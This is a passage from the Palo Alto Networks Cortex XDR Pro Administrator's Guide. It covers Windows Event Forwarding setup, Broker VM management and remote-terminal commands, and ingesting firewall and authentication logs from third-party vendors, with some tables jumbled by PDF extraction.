5. Right-click the certificate and navigate to All tasks > Manage Private Keys.
6. In the Permissions window, select Add and in the Enter the object name section, enter NETWORK
SERVICE followed by OK.

Verify the Group or user names appear.

STEP 7 | Add the Network Service account to the event’s forwarder Event Log Readers group.
1. To enable events forwarders to forward events, the Network Service account must be a member of
the Active Directory Event Log Readers group. In PowerShell, execute the following command on the
event forwarder:

C:\> net localgroup "Event Log Readers" "NT Authority\Network Service" /

add
2. Grant access to view the security event logs.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 341

© 2020 Palo Alto Networks, Inc.
 1. Run wevtutil gl security and take note of your channelAccess value.
2. Run wevtutil sl security "/ca:<channelAccess value>(A;;0x1;;;S-1-5-20)".
Make sure you grant access on each of your event forwarder hosts.

STEP 8 | Create a WEF Group Policy which applies to every Windows server you want to configure as a
WEF.
1. Open gpmc.msc.
2. Create a new Group Policy and name it Windows Event Forwarding.
3. In the Group Policy Management window, navigate to Domains > your domain name > Windows
Event Forwarding, right-click and select Edit.

4. In the Group Policy Management Editor:

• Set the WinRM service for automatic startup.
• Navigate to Computer Configuration > Policies > Windows Settings > Security Settings >
System Services, and double-click Windows Remote Management.
• Mark Define this policy setting and select Automatic.
• Enable collection of Broker VM supported Kerberos events; Kerberos pre-authentication,
authentication, request, and renewal tickets.
• Navigate to Computer Configuration > Policies > Advanced Audit Policy Configuration >
Audit Policy > Account Logon.
• Configure Audit Kerberos Authentication Service and Audit Kerberos Service Ticket
Operations to Success and Failure.
5. Configure the subscription manager.
Navigate to Computer Configuration > Policies > Administrative Templates > Windows
Components > Event Forwarding, and double-click Configure target Subscription Manager.

In the Configure target Subscription Manager window, and select Show.

342 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
 • Mark Enabled.
• Select Show and paste the Subscription Manage URL you copied from the Cortex XDR console.
6. Add Network Service to Event Log Readers group.
Navigate to Computer Configuration > Preferences > Control Panel Settings > Local Users and
Groups, right-click and select New Local Group.

In the Event Log Readers (built-in) Properties window:

• In theGroup name field, select Event Log Readers (built-in).
• In the Members section, Add and enter in the Name filed Network Service.

You must type the name, it cannot select the name from the browse button.

• Ok.
7. Configure the Windows Firewall.

If Windows Firewall is enabled on your event forwarders, you will have to define an
outbound rule to enable the WEF to reach port 5986 on the WEC.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows
Firewall with Advanced Security > Outbound Rules, right-click and select New Rule.
Configure the following:
• Type—Port
• TCP—Port 5986
• Allow the connection
• Mark Domain, disable Private and Public
• Name the rule Windows Event Forwarding
• Finish

STEP 9 | Apply the WEF Group Policy.

Link the policy to the OU or the group of Windows servers you would like to configure as event
forwarders. In the following flow, the domain controllers are configured as an event forwarder.
1. Navigate to Group Policy Management > <your domain name > Domain Controllers, right-click and
select Link an existing GPO....
2. Select the WEF Group Policy you created, Windows Event Forwarding.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 343

© 2020 Palo Alto Networks, Inc.
 3. In an administrative PowerShell console, execute the following command:

PS C:\Users\Administrator> gpupdate /force

PS C:\Users\Administrator> Restart-Service WinRM

STEP 10 | Verify Windows Event Forwarding.

1. In an administrative PowerShell console, run the following command:

PS C:\Users\Administrator> Get-WinEvent Microsoft-windows-WinRM/

operational -MaxEvents10
2. Look for WSMan operation EventDelivery completed successfully messages. These indicate events
forwarded successfully.

STEP 11 | (Optional) Manage the Window Event Collector.

After the Windows Event Collector has been activated in the Cortex XDR Management Console, right-
click your broker VM and select:
• Windows Event Collector > Configure Forwarder to define the event configuration information.
• Windows Event Collector > Deactivate to disable the Windows Event Collector.
• Windows Event Collector > Collection Configuration to view or edit existing or add new events to
collect.

STEP 12 | (Optional) In the Apps field, select Windows Event Collector to view the following applet
metrics:
• Connectivity Status—Whether the applet is connected to Cortex XDR.
• Logs Received and Logs Sent—Number of logs received and sent by the applet per second over the
last 24 hours. If the number of incoming logs received is larger than the number of logs sent, it could
indicate a connectivity issue.
• Resources—Displays the amount of CPU, Memory, and Disk space the applet is using.

344 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
Migrate Existing Windows Event Collector Certificate
For users who are running broker VM version 8.0 and later, and have already have a signed Windows Event
Collector certificate, it’s best to migrate your CA to the Cortex XDR console to better manage connection
between the Windows Event Collector and Broker VM.
To migrate your exiting Windows Event Collector signed certificate to the Cortex XDR console:

STEP 1 | In Cortex XDR, navigate to Cortex XDR > Settings > Broker VMs table and locate your broker
VM.

STEP 2 | Right click, select Applet Management > Windows Event Forwarder Migration.

STEP 3 | In the Windows Event Forwarder Migration window:

1. Securely import the signed certificate and key from your Linux server by copying and running in
OpenSSL the Run Export Command. Make sure you enter your certificate and key file names.
2. Copy the auto-generated password. Provide the following password when running the OpenSSL
command to authenticate import.
3. Upload CA Certificate by Drag and Drop or browse for your certificate.
4. Upload your certificate to the Cortex XDR console.
Cortex XDR displays an Action Succeeded notification.

After a successful migration, your certificates are managed and signed by Cortex XDR.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 345

© 2020 Palo Alto Networks, Inc.
 It is recommended to delete the CA PFX file and private key from the secured host
where the certificates were signed.

346 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
Manage Your Broker VMs
After you configured the broker VMs, you can manage your broker VMs from the Cortex XDR console.
• View Broker VM Details
• Edit Your Broker VM Configuration
• Collect Broker VM Logs
• Reboot a Broker VM
• Upgrade a Broker VM
• Open Remote Terminal
• Remove a Broker VM

View Broker VM Details

In Cortex XDR, navigate to Cortex XDR app > > Settings > Broker > VMs to view detailed information
regarding your registered broker VMs.
The Broker VMs table enables you to monitor and mange your broker VM and applet connectivity status,
version management, device details, and usage metrics.

The following table describes both the default fields and additional optional fields that you can add to the
alerts table using the column manager and lists the fields in alphabetical order.

Field Description

Status Indicator ( ) Identifies in the following columns:

• DEVICE NAME—Whether the broker machine is
registered and connected to Cortex XDR.
• VERSION—Whether the broker VM is running the
latest version.
• APPS—Whether the available applications are
connected to Cortex XDR.
Colors depict the following statuses:
• Black—Disconnected to Cortex XDR
• Red - Disconnected from Cortex X
• Orange—Past Version
• Green—Connected, Current Version

Check box to select one or more broker devices on

which to perform actions.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 347

© 2020 Palo Alto Networks, Inc.
 Field Description

APPS List of active or inactive applets and the connectivity

status for each.

CPU USAGE CPU usage of the broker device in percentage synced

every 5 minutes.

CONFIGURATION STATUS Broker VM configuration status. Status is defined by

the following according to changes made to any of the
broker VM configurations.
• up to date—Broker VM configuration changes made
through the Cortex XDR console have been applied.
in progress—Broker VM configuration changes
made through the Cortex XDR console are being
applied.
submitted—Broker VM configuration changes made
through the Cortex XDR console have reached the
broker machine and awaiting implementation.
failed—Broker VM configuration changes made
through the Cortex XDR console have failed. Need
to open a Palo Alto Networks support ticket.

DEVICE ID Device ID allocated to the broker machine by Cortex

XDR after registration.

DEVICE NAME Same as the Device ID.

A icon notifies of an expired broker. To reconnect,

generate a new token and re-register your broker
as described in steps 1 through 7of Configure the
Broker VM. Once registered, all previous broker
configurations are reinstated.

DISK USAGE Disk usage of the broker in portion of computer

storage that is currently in use.
Notification about low disk space appear in the
Notification Center.

EXTERNAL IP The IP interface the broker is using to communicate

with the server.
For AWS and Azure cloud environments, the field
displays the Internal IP value.

INTERNAL IP All IP addresses of the different interfaces on the

device.

348 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
 Field Description

MEMORY USAGE Memory usage of the broker device in percentage

synced every 5 minutes.

STATUS Connection status of the broker device. Status is

defined by either Connected or Disconnected.
Disconnected broker devices do not display CPU
Usage, Memory Usage, and Disk Usage information.
Notification about broker VM loosing connectivity to
Cortex XDR appear in the Notification Center.

UPGRADE TIME Timestamp of when the broker device was upgraded.

VERSION Version number of the broker device. If the status

indicator is not green, then the broker is not running
the latest version.
Notification about available new broker VM version
appear in the Notification Center.

Edit Your Broker VM Configuration

After configuring and registering your broker VM, navigate to Cortex XDR app > > Settings > Broker >
VMs to edit existing configurations and define additional settings.

STEP 1 | In the Broker VMs table, locate your broker VM, right-click and select Broker Management >
Configure.
If the broker VM is disconnected, you can only View the configurations.

STEP 2 | In the Broker VM Configurations window, define the following settings:

• Edit the exiting Network Interfaces, Proxy Server, NTP Server, and SSH Access configurations.
• (Requires Broker VM 8.0 and later) Device Name
Change the name of your broker VM device name by selecting the pencil icon. The new name will
appear in the Broker VMs table.

• (Requires Broker VM 8.0 and later) (Optional) Internal Network

Enter a network subnet to avoid the broker VM dockers colliding with your internal network. By
default, the Network Subnet is set to 172.17.0.1/16.

Internal IP must be:

• Formatted as prefix/mask, for example 192.0.2.1/24.
• Must be within /8 to /24 range.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 349

© 2020 Palo Alto Networks, Inc.
 • Cannot be configured to end with a zero.
For Broker VM version 9.0 and lower, Cortex XDR will accept only 172.17.0.0/16.

• Auto Upgrade
Enable or Disable automatic upgrade of the broker VM. By default, auto upgrade is enabled. If you
disable auto-upgrade, new features and improvements will require manual upgrade.

• Monitoring
Enable or Disable of local monitoring of the broker VM usage statistics in Prometheus
metrics format, allowing you to tap in and export data by navigating to http://
<broker_vm_address>:9100/metrics/. By default, monitoring your broker VM is disabled.

• (For Broker VM 7.4.5 and earlier) Enable/Disable ssh Palo Alto Networks support team SSH access
by using a Cortex XDR token.
Enabling allows Palo Alto Networks support team to connect to the broker VM remotely, not the
customer, with the generated password.

Make sure you save the password before closing the window. The only way to re-
generate a password is to disable ssh and re-enable.
• Broker UI Password
Reset your current Broker VM Web UI password. Define and Confirm your new password. Password
must be at least 8 characters.

STEP 3 | Save your changes.

Collect Broker VM Logs

Cortex XDR allows you to collect your broker VM logs directly from the Cortex XDR console.

350 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
STEP 1 |
Navigate to Cortex XDR app > > Settings > Broker > VMs table.

STEP 2 | Locate your broker VM, right-click and select Broker Management > Download Latest Logs.
Logs are generated automatically after approximately 30 seconds and are available for 24 hours after the
logs have been downloaded.

Reboot a Broker VM
Cortex XDR allows you reboot your broker VM directly from the Cortex XDR console.

STEP 1 |
Navigate to Cortex XDR app > > Settings > Broker > VMs table.

STEP 2 | Locate your broker VM, right-click and select Broker Management > Reboot VM.

Upgrade a Broker VM
Cortex XDR allows you to upgrade your broker VM directly from the Cortex XDR console.

STEP 1 |
Navigate to Cortex XDR app > > Settings > Broker > VMs table.

STEP 2 | Locate your broker VM, right-click and select Broker Management > Upgrade Broker version.
Upgrading your broker VM takes approximately 5 minutes.

Open Remote Terminal

Cortex XDR allows you to remotely connect to a broker VM directly from the Cortex XDR console.

STEP 1 |
Navigate to Cortex XDR app > > Settings > Broker > VMs table.

STEP 2 | Locate the broker VM you want to connect to, right-click and select Open Remote Terminal.
Cortex XDR opens a CLI window where you can perform the following commands:
• Logs
Broker VM logs located are located in /data/logs/ folder and contain the applet
name in file name. For example, folder /data/logs/[applet name], containing
container_ctrl_[applet name].log
• Ubuntu Commands
Cortex XDR Broker VM supports all Ubuntu commands. For example, telnet 10.0.0.10 80 or
ifconfig -a.
• Sudo Commands
Cortex XDR requires you use the following values when running commands:
Applet Names
• Agent Proxy—tms_proxy
• Syslog Collector—anubis
• WEC—wec
• Network Mapper—network_mapper
• Pathfinder—odysseus
Services

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 351

© 2020 Palo Alto Networks, Inc.
 • Upgrade-—zenith_upgrade
• Frontend service—webui
• Sync with Cortex XDR—cloud_sync
• Internal messaging service (RabbitMQ)-—rabbitmq-server
• Uploads metrics to the Cortex XDR—metrics_uploader
• Prometheus node exporter—node_exporter
• Backend service—backend

Command Description Example

applets_restart Restarts one or more applets. > sudo applets_restart

wec

applets_start Start one or more applets. >sudo applets_start

wec

applets_status Check the status of one or > sudo applets_status

more applets. wec

applets_stop Stop one or more applets. > sudo applets_stop

wec

services_restart Restarts one or more services. > sudo

OS services are not supported. services_restart
cloud_sync

services_start Start one or more services > sudo services_start

cloud_sync

services_status Check the status of one or > sudo services_status

more services. cloud_sync

services_stop Stop one or more services. > sudo

services_restart
cloud_sync

set_ui_password.sh Changes password of the > sudo

Broker VM Web UI. set_ui_password.sh
Run the command, enter the
new password followed by
Ctrl+D.

tcpdump Linux capture network traffic > sudo tcpdump -i eth0

command. -w /tmp/packets.pcap
You must use -w flag in order
to print output to file.

kill Linux kill command. > sudo kill [some pid]

route Modify your IP address /sbin/route

routing.

352 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
 Command Description Example

edit_routes Update static network routes. sudo edit_routes

Broker VMs
that were
migrated from
Pathfinder
VM do not
currently
support this
function.

Executing this command will

trigger an editor (VI), enter the
parameters in a new line, save,
exit, and restart the machine
and broker VM.

hostnamectl Check and update the machine sudo hostnamectl

hostname on a Linux operating set-hostname
system. <new_host_name>
Restart machine after running
command.

Remove a Broker VM
Cortex XDR allows you to remove a broker VM directly from the Cortex XDR console.

STEP 1 |
Navigate to Cortex XDR app > > Settings > Broker > VMs table.

STEP 2 | Locate your broker VM, right-click and select Broker Management > Remove Broker.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 353

© 2020 Palo Alto Networks, Inc.
Broker VM Notifications
To help you monitor your broker VM version and connectivity effectively, Cortex XDR send notifications to
your Cortex XDR console Notification Center.
Cortex XDR send the following notifications:
• New Broker VM Version—Notifies when a new broker VM version has been released.
• If the broker VM Auto Upgrade is disabled, the notification includes a link to the latest release
information. It is recommend you upgrade to the latest version.
• If the broker VM Auto Upgrade is enabled, 12 hours after the release you are notified of the latest
upgrade, or your are notified that the upgrade failed. In such a case, open a Palo Alto Networks
Support Ticket.
• Broker VM Connectivity—Notifies when the broker VM has lost connectivity to Cortex XDR.
• Broker VM Disk Usage—Notifies when the broker VM is utilizing over 90% of the allocated disk space.

354 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

External Data Ingestion
> External Data Ingestion Vendor Support
> Visibility of Logs and Alerts from External Sources in Cortex XDR
> Ingest Network Connection Logs
> Ingest Authentication Logs and Data
> Ingest Operation and System Logs from Cloud Providers
> Ingest External Alerts

355
356 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion
© 2020 Palo Alto Networks, Inc.
External Data Ingestion Vendor Support
Ingesting logs and data requires a Cortex XDR Pro per TB license.

To provide you with a more complete and detailed picture of the activity involved in an incident, you can
ingest data from a variety of external, third-party sources in Cortex XDR.
When ingesting data from an external source, Cortex XDR creates a dataset that you can query using XQL.
Datasets created in this way following the naming convention:

<vendor_name>_<product name>_raw

For example: cisco_asa_raw

The datatypes used for the fields in an imported dataset are automatically assigned based on the input
content. Fields can have a datatype of string, int, float, array, time, or boolean. All other fields are
ingested as a JSON object.

Log Type Vendor Support

Network Connections • Check Point FW1/VPN1

• Cisco ASA
• Fortinet Fortigate
• Corelight Zeek

Authentication Services • Azure AD

• Okta
• PingFederate
• PingOne for Enterprise

Operation and System Loggers • AWS CloudTrail and Amazon Cloudwatch

• Google Kubernetes Engine
• Google Cloud Platform

Endpoint Logs Windows Event Collector

Additional External Sources • External Vendors Forwarding CEF over Syslog

• ElasticSearch Filebeat
• Any vendor sending alerts

Cortex XDR can receive logs or both logs and alerts from the source. Depending on the data source, Cortex
XDR can provide visibility into your external data in the form of:
• Log stitching with other logs such as to create network or authentication stories.
• Raw data in queries from XQL Search.
• Logs in queries from Query Builder.
• Alerts reported by the vendor throughout Cortex XDR such as in the Alerts table, incidents, and views.
• Alerts raised by Cortex XDR on log data such as Analytics alerts
For more information, see Visibility of Logs and Alerts from External Sources in Cortex XDR.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 357

© 2020 Palo Alto Networks, Inc.
 To ingest data, you must set up the Syslog Collector applet on a Broker VM within your network.

358 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
Visibility of Logs and Alerts from External
Sources in Cortex XDR
Where you can view information ingested from external sources depends on the data source. The following
table describes the visibility of each vendor and device type. A indicates support where a dash (—)
indicates the feature is not supported.

Vendor and Device Raw Data Visibility Log Visibility Cortex XDR Alert Vendor Alert
Type Visibility Visibility

Network

Check Point
(Partial)
FW1/VPN1
Raw data is Network stories Cortex XDR can Alerts from Check
searchable in XQLthat include Check raise Cortex XDR Point firewalls are
Search. Point network alerts (Analytics, raised throughout
connection logs IOC, and BIOC) Cortex XDR when
Logs are searchable when relevant relevant.
with in the Query from logs.
sessionid Builder and in
= XQL Search.
0
are Logs
dropped. with
sessionid
=
0
are
dropped.

Fortinet Fortigate
(Partial)
Raw data is Network stories Cortex XDR can Alerts from
searchable in XQL that include raise Cortex XDR Fortinet firewalls
Search. Fortinet network alerts (Analytics, are raised
connection logs IOC, and BIOC) throughout
are searchable when relevant Cortex XDR when
in the Query from logs. relevant.
Builder and in
XQL Search.

Cisco ASA —
(Partial)
Raw data is Network stories Cortex XDR can
searchable in XQL that include raise Cortex XDR
Search. Cisco network alerts (Analytics,
connection logs IOC, and BIOC)
are searchable when relevant
in the Query from logs.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 359

© 2020 Palo Alto Networks, Inc.
 Vendor and Device Raw Data Visibility Log Visibility Cortex XDR Alert Vendor Alert
Type Visibility Visibility
Builder and in
XQL Search.

Corelight Zeek —
(Partial)
Raw data is Network stories Cortex XDR can
searchable in XQL that include raise Cortex XDR
Search. Corelight alerts (Analytics,
Zeek network IOC, and BIOC)
connection logs when relevant
are searchable from logs.
in the Query
Builder and in
XQL Search.

Authentication Services

Azure AD —
(Partial)
Logs and stories Logs stitched with Cortex XDR can
are searchable in authentication raise Cortex XDR
XQL Search stories are alerts (IOC and
searchable in the BIOC only) when
Query Builder. relevant from logs.

Okta —
(Partial)
Logs and stories Logs stitched with Cortex XDR can
are searchable in authentication raise Cortex XDR
XQL Search stories are alerts (IOC and
searchable in the BIOC only) when
Query Builder. relevant from logs.

PingFederate —
(Partial)
Logs and stories Logs stitched with Cortex XDR can
are searchable in authentication raise Cortex XDR
XQL Search stories are alerts (IOC and
searchable in the BIOC only) when
Query Builder. relevant from logs.

PingOne for —
(Partial)
Enterprise
Logs and stories Logs stitched with Cortex XDR can
are searchable in authentication raise Cortex XDR
XQL Search stories are alerts (IOC and
searchable in the BIOC only) when
Query Builder. relevant from logs.

Operation and System Logs from Cloud Providers

360 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
Vendor and Device Raw Data Visibility Log Visibility Cortex XDR Alert Vendor Alert
Type Visibility Visibility

AWS CloudTrail — —
and Amazon
CloudWatch Raw data is Cortex XDR can
searchable in XQL raise Cortex XDR
Search. alerts (IOC and
BIOC only) when
relevant from logs.

Google Cloud — —
Platform
Raw data is Cortex XDR can
searchable in XQL raise Cortex XDR
Search. alerts (IOC and
BIOC only) when
relevant from logs.

Google — —
Kubernetes
Engine Raw data is Cortex XDR can
searchable in XQL raise Cortex XDR
Search. alerts (IOC and
BIOC only) when
relevant from logs.

Endpoint Logs

Windows Event —
(Partial)
Collector
Windows event Windows event Cortex XDR can
logs are available logs are available raise Cortex XDR
with agent EDR with agent EDR alerts (IOC and
data and are data and are BIOC only) when
searchable in XQL searchable in the relevant from logs.
Search. Query Builder.

Additional External Sources

Other Vendors —
Sending CEF or
To enable Cortex
LEEF over Syslog Raw data is Cortex XDR can
XDR to display
searchable in XQL raise Cortex XDR
alerts from other
Search. alerts (IOC and
vendors, you
BIOC only) when
must map your
relevant from logs.
alert fields to the
Cortex XDR field
format (see Ingest
External Alerts).

Any vendor — — —
sending alerts
Alerts surfaced
throughout

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 361

© 2020 Palo Alto Networks, Inc.
 Vendor and Device Raw Data Visibility Log Visibility Cortex XDR Alert Vendor Alert
Type Visibility Visibility
Cortex XDR
when relevant.
To enable Cortex
XDR to display
your alerts, you
must map your
alert fields to the
Cortex XDR field
format (see Ingest
External Alerts).

362 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
Ingest Network Connection Logs
• Ingest Logs from Check Point Firewalls
• Ingest Logs from Cisco ASA Firewalls
• Ingest Logs from Fortinet Fortigate Firewalls
• Ingest Logs from Corelight Zeek
• Ingest Logs from a Syslog Receiver

Ingest Logs from Check Point Firewalls

Ingesting logs and data requires a Cortex XDR Pro per TB license.

If you use Check Point FW1/VPN1 firewalls, you can still take advantage of Cortex XDR investigation and
detection capabilities by forwarding your Check Point firewall logs to Cortex XDR. Check Point firewall logs
can be used as the sole data source, however, you can also use Check Point firewall logs in conjunction with
Palo Alto Networks firewall logs and additional data sources.
Cortex XDR can stitch data from Check Point firewalls with other logs to make up network stories
searchable in the Query Builder and in XQL queries. Cortex XDR can also return raw data from Check Point
firewalls in XQL queries.

Logs with sessionid = 0 are dropped.

Destination Port data is available only in the raw logs.

In terms of alerts, Cortex XDR can both surface native Check Point firewall alerts and raise its own alerts on
network activity. Alerts are displayed throughout Cortex XDR alert, incident, and investigation views.
To integrate your logs, you first need to set up an applet in a broker VM within your network to act as a
Syslog Collector. You then configure your Check Point firewall policy to log all traffic and set up the Log
Exporter on your Check Point Log Server to forward logs to the Syslog Collector in a CEF format.
As soon as Cortex XDR starts to receive logs, the app can begin stitching network connection logs with
other logs to form network stories. Cortex XDR can also analyze your logs to raise Analytics alerts and can
apply IOC and BIOC rule matching. You can also use queries to search your network connection logs.

STEP 1 | Ensure that your Check Point firewalls meet the following requirements:
Check Point software version—R77.30, R80.10, R80.20, R80.30, or R80.40

STEP 2 | Increase log storage for Check Point firewall logs.

As an estimate for initial sizing, note that the average Check Point log size is roughly 700 bytes. For
proper sizing calculations, test the log sizes and log rates produced by your Check Point firewalls. For
more information, see Allocate Log Storage for Cortex XDR.

STEP 3 | Activate the Syslog Collector.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 363

© 2020 Palo Alto Networks, Inc.
STEP 4 | Configure the Check Point firewall to forward syslog events in CEF format to the Syslog
Collector.
Configure your firewall policy to log all traffic and set up the Log Exporter to forward logs to the Syslog
Collector. For more information on setting up Log Exporter, see the Check Point documentation.

Ingest Logs from Cisco ASA Firewalls

Ingesting logs and data requires a Cortex XDR Pro per TB license.

If you use Cisco ASA firewalls, you can still take advantage of Cortex XDR investigation and detection
capabilities by forwarding your firewall logs to Cortex XDR. This enables Cortex XDR to examine your
network traffic to detect anomalous behavior. Cortex XDR can use Cisco ASA firewall logs as the sole data
source, but can also use Cisco ASA firewall logs in conjunction with Palo Alto Networks firewall logs. For
additional endpoint context, you can also use Cortex XDR to collect and alert on endpoint data.
As soon as Cortex XDR starts to receive logs, the app can begin stitching network connection logs with
other logs to form network stories. Cortex XDR can also analyze your logs to raise Analytics alerts and can
apply IOC and BIOC rule matching. You can also use queries to search your network connection logs.
To integrate your logs, you first need to set up an applet in a broker VM within your network to act as a
Syslog Collector. You then configure forwarding on your log devices to send logs to the Syslog Collector.

STEP 1 | Verify that your Cisco ASA firewall meets the following requirements:
• Syslog in Cisco-ASA format
• Must include timestamps
• Only supports messages: 302013, 302014, 302015, 302016

STEP 2 | Activate the Syslog Collector.

STEP 3 | Increase log storage for Cisco ASA firewall logs.

As an estimate for initial sizing, note that the average Cisco ASA log size is roughly 180 bytes. For proper
sizing calculations, test the log sizes and log rates produced by your Cisco ASA firewalls. For more
information, see Allocate Log Storage for Cortex XDR.

STEP 4 | Configure the Cisco ASA firewall or the log device forwarding logs from it to log to the Syslog
Collector.
Configure your firewall policy to log all traffic and forward the traffic logs to the Syslog Collector. By
logging all traffic, you enable Cortex XDR to detect anomalous behavior from Cisco ASA firewall logs.
For more information on setting up Log Forwarding on Cisco ASA firewalls, see the Cisco ASA Series
documentation.

Ingest Logs from Fortinet Fortigate Firewalls

Ingesting logs and data requires a Cortex XDR Pro per TB license.

If you use Fortinet Fortigate firewalls, you can still take advantage of Cortex XDR investigation and
detection capabilities by forwarding your firewall logs to Cortex XDR. This enables Cortex XDR to examine
your network traffic to detect anomalous behavior. Cortex XDR can use Fortinet Fortigate firewall logs as
the sole data source, but can also use Fortinet Fortigate firewall logs in conjunction with Palo Alto Networks

364 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
 firewall logs. For additional endpoint context, you can also use Cortex XDR to collect and alert on endpoint
data.
As soon as Cortex XDR starts to receive logs, the app can begin stitching network connection logs with
other logs to form network stories. Cortex XDR can also analyze your logs to raise Analytics alerts and can
apply IOC and BIOC rule matching. You can also use queries to search your network connection logs.
To integrate your logs, you first need to set up an applet in a broker VM within your network to act as a
syslog collector. You then configure forwarding on your log devices to send logs to the syslog collector.

STEP 1 | Verify that your Fortinet Fortigate firewalls meet the following requirements:
• Must use FortiOS 6.2.1 or a later release
• timestamp must be in nanoseconds

STEP 2 | Activate the Syslog Collector.

STEP 3 | Increase log storage for Fortinet Fortigate firewall logs.

As an estimate for initial sizing, note that the average Fortinet Fortigate log size is roughly 1,070 bytes.
For proper sizing calculations, test the log sizes and log rates produced by your Fortinet Fortigate
firewalls. For more information, see Allocate Log Storage for Cortex XDR.

STEP 4 | Configure the log device that receives Fortinet Fortigate firewall logs to forward syslog events
to the syslog collector.
Configure your firewall policy to log all traffic and forward the traffic logs to the syslog collector. By
logging all traffic, you enable Cortex XDR to detect anomalous behavior from Fortinet Fortigate firewall
logs. For more information on setting up Log Forwarding on Fortinet Fortigate firewalls, see the Fortinet
FortiOS documentation.

Ingest Logs from Corelight Zeek

Ingesting logs and data requires a Cortex XDR Pro per TB license.

If you use Corelight Zeek sensors for network monitoring, you can still take advantage of Cortex XDR
investigation and detection capabilities by forwarding your network connection logs to Cortex XDR. This
enables Cortex XDR to examine your network traffic to detect anomalous behavior. Cortex XDR can use
Corelight Zeek logs as the sole data source, but can also use logs in conjunction with Palo Alto Networks or
third-party firewall logs. For additional endpoint context, you can also use Cortex XDR to collect and alert
on endpoint data.
As soon as Cortex XDR starts to receive logs, the app can begin stitching network connection logs with
other logs to form network stories. Cortex XDR can also analyze your logs to raise Analytics alerts and can
apply IOC and BIOC rule matching. You can also use queries to search your network connection logs.
To integrate your logs, you first need to set up an applet in a broker VM within your network to act as a
Syslog Collector. You then configure forwarding on your Corelight Zeek sensors (using the default Syslog
export option of RFC5424 over TCP) to send logs to the Syslog Collector.

STEP 1 | Activate the Syslog Collector.

During activation, you define the Listening Port over which you want the Syslog Collector to receive
logs. You must also set TCP as the transport Protocol and Corelight as the Syslog Format.

STEP 2 | Forward logs to the Syslog Collector.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion 365

© 2020 Palo Alto Networks, Inc.
 Cortex XDR can receive logs from Corelight Zeek sensors that use the Syslog export option of RFC5424
over TCP.
1. In the syslog configuration of Corelight Zeek (Sensor > Export), enter the details for your Syslog
Collector including the hostname or IP address of the broker VM and corresponding listening port
that you defined during activation of the Syslog Collector, default Syslog format (RFC5424), and any
log exclusions or filters.
2. Save your syslog configuration to apply the configuration to your Corelight Zeek Sensors.
For full setup instructions, see the Corelight Zeek documentation.

366 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | External Data Ingestion

© 2020 Palo Alto Networks, Inc.
Ingest Authentication Logs and Data
Ingesting Authentication Logs and Data requires a Cortex XDR Pro per TB license.

When you ingest authentication logs and data from an external source, Cortex XDR can weave that
information into authentication stories. An authentication story unites logs and data regardless of the
information source (for example, from an on-premise KDC or from a cloud-based authentication service)
into a uniform schema. To search authentication stories, you can use the Query Builder or Native Search.
Cortex XDR can ingest authentication logs and data from the following authentication services:
• Microsoft Azure AD
• Okta
• PingFederate
• PingOne

Ingest Logs from Microsoft Azure AD

Ingesting Logs from Azure AD requires a Cortex XDR Pro per TB license and a Microsoft
Azure Premium 1 or Premium 2 license.

To receive authentication and audit logs from Azure AD, you must first configure the SaaS Log Collection
settings in Cortex XDR. After you set up log collection, Cortex XDR begins receiving new logs and data from
the source.

To address Azure reporting latency, there is a 10-minute latency period for Cortex XDR to
receive Azure AD logs.

When Cortex XDR begins receiving logs, the app creates a new dataset (MSFT_Azure_AD_raw for
authentication logs or MSFT_Azure_AD_Audit_raw for audit logs) that you can use to initiate XQL Search
queries. For example queries, refer to the in-app XQL Library. When relevant, Cortex XDR stitches Azure
AD authentication logs with authentication stories. Cortex XDR can also raise Cortex XDR alerts (IOC and
BIOC only) when relevant from Azure AD logs.

STEP 1 | From the Microsoft Azure Console, create an app for Cortex XDR with the following API
permissions: AuditLog.ReadAll and Directory.ReadAll. For more information on Microsoft
Azure, see the following instructions on the Microsoft documentation portal:
• Register an app: https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-
register-app
• Add API permissions for Directory.Read.All and AuditLog.Read.All with type Application: https://
docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-configure-app-access-web-
apis#add-permissions-to-access-web-apis
